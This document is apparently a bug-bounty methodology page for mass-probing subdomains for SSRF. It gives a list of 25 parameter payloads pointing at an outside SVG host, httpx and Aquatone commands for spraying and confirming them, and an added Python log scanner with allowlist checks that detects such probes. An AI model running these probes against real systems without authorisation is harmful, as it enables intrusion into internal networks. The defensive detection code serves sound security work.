SSRF hunt with httpx & aquatone
Tools Used:
Subfinder
Sublist3r
Httpx
Aquatone
Methodology:
Find subdomains with any tool and save them in domains.txt
Here are the top 25 parameters to test for SSRF. (Note: you can add more parameters from any other resource if you want.)
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
Add http://brutelogic.com.br/poc.svg in place of {target}
Now the parameters would look like this, e.g.:
?callback=http://brutelogic.com.br/poc.svg
Now save all parameters in ssrf.txt
Now run httpx
Command:
httpx -l /root/domains.txt -paths ssrf.txt -threads 200 -o ssrf-poc.txt
httpx appends every entry of ssrf.txt (parameter plus payload) to each subdomain/target domain in domains.txt, probes the resulting URLs and saves the responding ones in ssrf-poc.txt
Now run Aquatone
Command:
cat /root/ssrf-poc.txt | ./aquatone -out /root/screenshots
If an endpoint is vulnerable, the server fetches poc.svg and renders the domain name in the page, which shows up in the Aquatone screenshot. This may be an SSRF that chains to XSS or a critical SSRF on its own; the Aquatone report confirms whether or not the endpoint is vulnerable to SSRF.
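The same 25 parameters seen from the defender's side, as an added Python example that is not part of the original page: it scans web-server access-log lines for requests whose URL-typed parameter carries an absolute URL to a host outside an allowlist or to an internal address, which is exactly what a probe like the one above looks like in the logs. The allowlist (ALLOWED_HOSTS), the client addresses and the log lines are constructed for the example; the classify_destination predicate is also the check an application should apply before fetching a user-supplied destination.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# The 25 URL-typed parameter names from the list above.
SSRF_PARAMS = {
    "dest", "redirect", "uri", "path", "continue", "url", "window", "next",
    "data", "reference", "site", "html", "val", "validate", "domain",
    "callback", "return", "page", "feed", "host", "port", "to", "out",
    "view", "dir",
}

# Hosts the application is legitimately allowed to fetch from (assumed, constructed).
ALLOWED_HOSTS = {"cdn.example.internal", "api.example.com"}

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify_destination(value: str):
    """Return a reason string if `value` is a destination the server must not fetch, else None.

    A bare word or relative path (e.g. page=2) is not an outbound fetch target and passes.
    """
    parts = urlsplit(value)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return f"non-http scheme {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return None
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return f"internal address {host}"
    except ValueError:
        pass  # a DNS name, checked against the allowlist below
    if host not in ALLOWED_HOSTS:
        return f"host {host!r} not in allowlist"
    return None


def scan_log(lines):
    """Return (client, parameter, value, reason) for each request with a suspicious destination."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() not in SSRF_PARAMS:
                continue
            reason = classify_destination(value)
            if reason:
                findings.append((m.group("client"), name, value, reason))
    return findings


# Constructed sample log lines: two probes with the page's payload host, one pointing at
# loopback, one legitimate allowlisted fetch and one request whose parameters are not URLs.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2022:10:00:01 +0000] "GET /preview?url=http://brutelogic.com.br/poc.svg HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2022:10:00:02 +0000] "GET /preview?url=http://127.0.0.1/ HTTP/1.1" 200 88',
    '203.0.113.5 - - [10/Jan/2022:10:00:03 +0000] "GET /login?next=//brutelogic.com.br/ HTTP/1.1" 302 0',
    '198.51.100.9 - - [10/Jan/2022:10:00:04 +0000] "GET /preview?url=https://api.example.com/v1/item/7 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Jan/2022:10:00:05 +0000] "GET /search?page=2&view=list HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, name, value, reason in scan_log(SAMPLE_LOG):
        print(f"{client} {name}={value} -> {reason}")
```

The scheme-relative form (`next=//host/`) is handled because urlsplit still yields a hostname for it, and the numeric checks use the ipaddress module so IPv6 loopback and link-local addresses are caught as well as IPv4. In production the allowlist check belongs in the application before the fetch is made; the log scan is the detection layer for parameters the application forgot to guard.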
References:
https://twitter.com/Alra3ees/status/1478188105060470785
https://github.com/KathanP19/HowToHunt/blob/master/SSRF/SSRF.md
https://github.com/lutfumertceylan/top25-parameter/blob/master/ssrf-parameters.txt